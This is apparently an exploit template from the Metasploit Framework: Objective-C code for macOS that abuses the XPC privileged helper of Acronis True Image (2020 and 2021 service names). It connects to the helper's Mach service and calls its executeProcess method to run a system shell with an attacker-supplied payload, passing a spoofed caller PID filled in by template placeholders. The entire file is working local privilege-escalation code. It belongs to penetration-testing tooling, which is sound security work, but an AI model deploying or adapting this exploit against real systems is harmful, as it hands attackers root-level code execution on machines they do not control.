rapid7/metasploit-framework

#import <Foundation/Foundation.h>

@protocol HelperToolProtocol
- (void)checkFullDiskAccessWithReply:(void (^)(BOOL))arg1;
- (void)executeProcess:(NSString *)arg1 arguments:(NSArray *)arg2 caller:(int)arg3 withReply:(void (^)(int))arg4;
- (void)getProcessIdentifierWithReply:(void (^)(int))arg1;
@end


int main(int argc, char *argv[])
{
    NSString *service_name;
    NSString *payload = @"<%= @payload_path %>";
    NSArray *arg_array = @[@"-c", payload];
    NSFileManager *file_manager = [NSFileManager defaultManager];

    NSString *service_name_2020 = @"com.acronis.trueimagehelper";
    NSString *service_name_2021 = @"com.acronis.helpertool";
    NSString *helper_path_2020 = [NSString stringWithFormat:@"/Library/PrivilegedHelperTools/%@", service_name_2020];
    NSString *helper_path_2021 = [NSString stringWithFormat:@"/Library/PrivilegedHelperTools/%@", service_name_2021];

    if ([file_manager fileExistsAtPath:helper_path_2020])
    {
        service_name = service_name_2020;
    }
    else
    {
        service_name = service_name_2021;
    }

    NSXPCConnection *connection = [[NSXPCConnection alloc] initWithMachServiceName:service_name options:0x1000];
    NSXPCInterface *interface = [NSXPCInterface interfaceWithProtocol:@protocol(HelperToolProtocol)];
    [connection setRemoteObjectInterface:interface];

    [connection resume];

    id obj = [connection remoteObjectProxyWithErrorHandler:^(NSError *error)
    {
        return;
    }];

    [obj executeProcess:@"<%= sys_shell %>" arguments:arg_array caller:<%= @pid %> withReply:^(int arg)
    {
        return;
    }];
}